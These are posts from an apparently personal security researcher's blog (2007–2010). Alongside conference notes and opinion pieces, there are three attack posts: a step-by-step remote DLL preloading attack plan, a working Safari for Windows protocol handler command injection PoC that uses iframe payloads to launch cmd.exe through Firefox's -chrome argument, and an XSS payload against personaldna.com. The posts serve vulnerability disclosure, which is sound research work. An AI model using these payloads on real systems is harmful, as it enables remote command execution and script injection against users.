Larholm.com

Me, myself and I

August 24th, 2010

Exploiting DLL Preloading remotely without user interaction

Microsoft published an article yesterday about DLL Preloading on TechNet.

The basic premise behind a DLL Preloading attack is simple: unless you explicitly set the paths to your DLL files they might be loaded from the current directory. That current directory might contain a file called “xyz.dll” which will then get included into your process instead of your original “xyz.dll” file from your installation directory.

This is a class of vulnerabilities that affects a wide range of applications, but the severity of these have so far been considered local and low impact.

It seems that Microsoft have been made aware of a remote attack vector that allows you to exploit DLL Preloading from a webpage.

The TechNet article does not mention what that attack vector is, so for the sake of debate I will highlight the most logical steps you will need to perform to remotely exploit DLL Preloading without any user interaction other than visiting a website :)

  1. Get user to visit malicious website
  2. Malsite contains an IFRAME pointing to an SMB/WebDav share
  3. The share contains a non-malicious file which can be automatically opened without warnings, such as an .JPG or .DOCX file, as well as a malicious file called “xyz.dll”
  4. The non-malicious file is then automatically opened through clickjacking
  5. The local process responsible for handling the non-malicious file, such as word.exe, is launched and starts looking for its DLL dependencies, such as “xyz.dll”
  6. The current working directory is set to the malicious share because the non-malicious file was opened from here
  7. Unless explicitly handled by the local process, “xyz.dll” will be included from the current working directory, the malicious share, the contents of which is controlled by the attacker

The only reason I am not giving this post the title of 0-day is because this has been known for some time and I have not bundled this as an exploit for you – I am on my way to work right now :)

April 6th, 2010

Looking into Chrome

I am currently trying to setup a proper build environment for Google Chrome, so that I can test some crashes in more details.

It seems amazing that a brief line of Javascript code is able to completely freeze the Chrome process and all its threads, but I am guessing it is a synchronization issue when talking with the Win32 API.

More details should come about if I finally get Chrome building locally, otherwise I’ll consider just posting some reproducible test cases and let somebody else look into exploiting it.

It’s part of the screen update process and also freezes the Sandbox broker process, so with some luck this should be running outside the Chrome sandbox :)

April 6th, 2010

Community Day 10 in Copenhagen

Community Day is back again this year in Copenhagen.

If you like free tech-talks, networking and beer then reserve May 27 for Community Day ‘10.

There will be some 20 sessions on four concurrent tracks, with 45 minutes of presentation time and 30 minutes for Q&A.

Most of the session titles are already set, ranging from HTML5 to Firefox plugin development and Ruby on Rails, and the agenda will be updated soon with speaker names and details.

Casper Fabricius, an old colleague and friend, will be giving his talk called “Replace ASP.NET with IronRuby on Rails”.

I will also be giving two talks at CD10, “Hacking a website” and “Advanced jQuery”.

Sign up for Community Day ‘10 (it’s free!) and get ready for a day of geekery, networking and free beer :)

March 16th, 2010

Internet Explorer 9 at MIX – and Windows Phone 7 IE

I am currently at MIX 10 in Las Vegas together with Mads Kristensen and Kenneth Auchenberg.

The IE9 keynote was great and revealed many new facets of the upcoming Internet Explorer 9. There will be a new Jscript engine, codenamed “Chakra”, lots of HTML 5 support and hardware acceleration of almost all rendering aspects – not just for text and images, but also for SVG and video playback.

Chrome and Firefox were literally stutteriing when they tried to play a single 720P video while IE9 was running smoothly with two simultaneous 720P streams, and the performance of the new Trident engine was even better when it came to animating SVG and CSS.

“Chakra” is still in development and can be experienced in the IE9 developer preview at ietestdrive.com. The current JScript engine in IE8 is JScript 5.8 where as the new “Chakra” engine identifies itself as JScript 9.0. “Chakra” will compile Javascript in the background across multiple CPU cores, so I expect to see some reentrant vulnerabilities.

I will dig deeper into IE9 when I get the chance, to see what kind of security vulnerabilities I can uncover.

Another point of interest at the conference is the upcoming Windows Phone 7 Series; the name is too long, they should really just remove the “Series” suffix.

I had a chance to play with the phone, but the Microsoft guys were not really that keen on revealing what browser version it is running. Despite this, I managed to secure a copy of the useragent string:

Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6

Unlike the iPhone, Windows Phone 7 will launch with a browser that does not support the latest web standards.Far from it, actually, as IE7 is already starting to feel outdated. There is some consolation, in that the mobile version of IE7 will incorporate some of the new technologies from IE8.

Anyway, back to the conference..

Update: I am covering the latest buzz surrounding IE9 at IE9Buzz.com :)

August 31st, 2007

Silverlight 1.0 Release Candidate

Yesterday I was at a Silverlight conference in Copenhagen which was actually quite interesting. For those of you who might not know what Silverlight is, it is a Flash competitor developed by Microsoft based on Windows Presentation Foundation and XAML. If you are not interested in Silverlight development in general then jump straight to the end of this article for the vulnerability :)

Jeppe Rørbæk from Microsoft Denmark gave the first presentation which mainly focused on the basics of embedding Silverlight 1.0 and creating XAML files. I have been experimenting with Silverlight since the first CTP release back in December 2006, so most parts of this presentation was a bit repetitive for me. The main consensus that I could get from the other attendees was that Microsoft should focus on shipping a default Aspx Extender for embedding Silverlight applications, as I seemed to be the only one comfortable enough with Javascript to really bother getting my hands dirty. The lack of input controls in the 1.0 release was also a bit discomforting to some, although regular HTML input boxes can be used in its place.

Next up was Martin Eiler from Valtech who focused on XAML development through Blend Expression. Martin showcased a video player application that he was currently developing, and I couldn’t help noticing the similarities between it and Joost, particularly when it came to the messaging aspects. Joost is written in Mozilla’s XUL and from the walkthrough of some of his code it was quite clear that Silverlight development is a lot more straightforward than dealing with the typical RDF hell in XUL development.

Martins presentation also gave me the most ideas for what areas I should focus on when finding vulnerabilities in Silverlight. Font embedding in Silverlight is vastly simpler than in Flash and it is accomplished through automatically downloading a ZIP file containing a Truetype font which is then parsed and rendered on your XAML text. I could imagine that fuzzing the Truetype renderer might uncover some interesting parsing vulnerabilities. Failing that, there is some interesting potential for directory traversal vulnerabilities through the Downloader object in Silverlight, which will automatically decompress ZIP archives and store its content on your local hard drive. Since the plugin itself is not written in managed code and is responsible for parsing and rendering not just Truetype fonts but also PNG, BMP, TIFF and WMF images I will also have a go at it with some image fuzzing and see what stands out.

Next up was Niels Hartvig, founder of the open source Umbraco CMS. The first part of his presentation focused on a Powerpoint replacement that Niels had developed in Silverlight, which was a great success with the audience. This transitioned into an example of how Umbraco, or any other CMS, could be extended to serve dynamic XAML documents (Silverlight applications). The audience was mainly comprised of ASP.NET and back end developers, so the presentation was a natural fit and most likely inspired a couple of developers on how they could more easily use Silverlight as a presentation layer. Unfortunately his Powerpoint replacement was written for Silverlight 1.0, so all of the XAML generation and event handling relied heavily on Javascript. I would love to see a 1.1 release with all of the interaction dynamics staying in C#. Just as with the regular DOM the Silverlight Object Model will only allow you to retrieve data from the domain where it was served, but seeing as the Silverlight team has probably had to implement this logic themselves instead of borrowing from IE there could be some interesting potential for terminating string references (think %00).

Jeppe Rørbæk finished off the conference with a look at some of the new features in Silverlight 1.1, particularly the CLR and DLR implementations which will be a part of the plugin bundle. Most of the audience seemed thrilled enough with the new vector and video capabilities of Silverlight 1.0, but having the promise of a C# CLR embedded in the browser dangling in front of them left most with the impression that they should neglect the 1.0 release until they could do some “real” work in 1.1.

There will still be a lot of Javascript interfacing in 1.1, which is only natural when you are interfacing with the DOM of your HTML document. From what I could see in Jeppe’s code it seems apparent that exposing events to Javascript from the managed C# code is implemented by assigning a JS function reference on an exposed property. This will let you call unmanaged code from C# and since I can control the entirety of that pointer reference I can imagine that this will also be a candidate for vulnerabilities.

And speaking about vulnerabilities, I thought I would detail a vulnerability that was silently patched in the Release Candidate of Silverlight :)

The beta release of Silverlight 1.0 had a heap overflow on the findName method which occurs after handing it a string larger than 260086 bytes.

Realistically speaking, this has not been a threat to a lot of people. Unlike the Safari 3.0 release for Windows, which received millions of end user installations after being featured prominently on the frontpage of apple.com, the beta release of Silverlight has gone largely unnoticed outside of developer circles.

What is more interesting than the vulnerability itself, at least to me, is that it highlights how Microsoft has not implemented static source code analysis as part of either their commit cycles or beta release builds. This seems to be reserved for release candidates and greater.

To sum it all up, I think that Silverlight is an interesting technology and a worthy Flash competitor. Adobe has suddenly seen some actual competition arise, which has pushed them to update their Flash player with h.264 video and AAC audio playback. Whether or not Youtube decides to stay with Flash or go with HD quality WMV this can only be good news, as we can hopefully abandon those awfully looking FLV files.

And whether or not any of that happens I have found an interesting new product to uncover some vulnerabilities in, so remember to subscribe to the feed :)

June 21st, 2007

Who made OSI king of the world?

This is not strictly security related, but I just had to write a few words about that OSI article. Rest assured that you will get some security news very soon, I found half a dozen new vulnerabilities in Safari for both Windows and OS X :)

Over at opensource.net Michael Tiemann, the president of the Open Source Initiative, has written an article about the apparent misuse of the term open source. He has declared that they (OSI) want to slam down on any vendor who claims to be open source but does not use “an OSI-approved license”. In his own words:

“Enough is enough. Open Source has grown up. Now it is time for us to stand up. I believe that when we do, the vendors who ignore our norms will suddenly recognize that they really do need to make a choice: to label their software correctly and honestly, or to license it with an OSI-approved license that matches their open source label.”

I generally applaud the Open Source Initiative for their dedication in promoting open source software, but the entire premise of this article does not ring true for me. This is my public comment to Michael Tiemann, originally posted as a comment to his article.

Read the rest of this entry »

June 12th, 2007

Site overload, back in business

I went to the beach today at around 16:00 (4 PM) after having moderated all of your comments on my previous post “Safari for Windows, 0day exploit in 2 hours“. When I got back just now at 21:00 (9 PM) this site was no longer serving any content and a lot of people had mailed me to complain.

I am running WordPress and it was not all too happy about the abundance of visitors that came by my site today. In the last 12 hours more than 30.000 unique visitors generated more than 180.000 hits, which is quite a jump from my normal rate of 500 unique visitors per day. I guess you people like to read about security research, especially Slashdot, TechMeme and Reddit :)

Luckily I had the support of a great technical team, namely Tyron from HostGator.com where my site is hosted. After a brief live chat the site was back up and running just fine. I’m amazed at the level of support I have received so far from HostGator and am only happy to recommend them through the previous link (yes, it’s an affiliate signup).

So what happens next? First of all, I have read through all of your feedback about the PoC exploit and will do some tests on OS X tomorrow that will result in a positive or negative verification about whether the vulnerability can be adjusted to work on OS X as well.

Following that, I will continue to write about my security research and publish any new findings here – so remember to subscribe to my feed :)

June 12th, 2007

Safari for Windows, 0day exploit in 2 hours

Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.

I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research :)

A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old fashioned application specific knowledge can get you far.

The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.

URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.

“C:\Program Files\My Application\myprotocol.exe” “someserver.com/someargument”

This works almost as expected in Safari. With a simple link you cannot pass along arbitrary characters to the command line which is later executed and most attempts at doing so will simply be URL escape, such that myprotocol://someserver.com/some"[SPACE]argument is turned into

“C:\Program Files\My Application\myprotocol.exe” “someserver.com/some”%20argument

This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as

<iframe src=’myprotocol://someserver.com” < foo > bar | foobar “arg1′></iframe>

which is turned into the following command line.

“C:\Program Files\My Application\myprotocol.exe” “someserver.com” < foo > bar | foobar “arg1″

As the knowledgeable reader might have noticed we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol which is handled by my local Firefox installation. We hash together an example request..

<iframe src=’gopher://larholm.com” |cmd /c echo “FOO’></iframe>

..Fire up procexp, launch safari and watch the output.

“C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” -requestPending

Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.

C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath(‘C:\\windows\\system32\\cmd.exe’);
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);

Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.


<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)
+String.fromCharCode(92)+'Windows'
+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)'></iframe<

And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.

http://www.larholm.com/vuln/safaripoc.html

The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.

It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these.

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities :)

Cheers
Thor Larholm

UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.

April 8th, 2007

Thor, the Benevolent Leader

I am always amused when I take a personality test. I find it easy to discern the reasoning behind the questions and more often than not I disagree with the wording of specific questions. Just today, I found an interesting test with some funky sliders and graphs at personaldna.com, and the results are in:

And there you have it, I am a very manly and functional Benevolent Leader with low Authoritarianism. You can hover those individual color bars for an explanation of each.

Coincidentally, I am not a big fan of having Benevolent Leader turned into a link that points at personaldna.com as I have already been kind enough to link their way. So how do we remove this link but retain the hover functionality? If you’re curious the script code for embedding the above color bar is:

<script src=”http://personaldna.com/h/?k=ajbecRqMlZIdRcZ-OO-AAAAA-b077&t=Benevolent+Leader”>
</script>

There is a lack of input validation of the t parameter which enables a XSS vulnerability on personaldna.com. If you specify t=Benevolent+Leader',true);alert(location)// you are overwriting their script logic. If you specify t=</a>Benevolent+Leader you are injecting HTML. A properly URL encoded parameter would be t=%3C/a%3EBenevolent+Leader".

So there you have it, the same colored bar but without a link on the text portion :)

April 5th, 2007

Cheers and musing

Another visitor!

You might know me, you might not. In either case, welcome. I used to have my web presence on jscript.dk, but alas some domain shark grabbed it when I forgot to renew the domain.

So what will I amuse you with to stay a while? Mostly random musings over security vulnerabilities, javascript development, the web and myself. In the mean time I will be making a less bloggy template for WordPress and enjoy my Easter vacation.

improbot.gif

|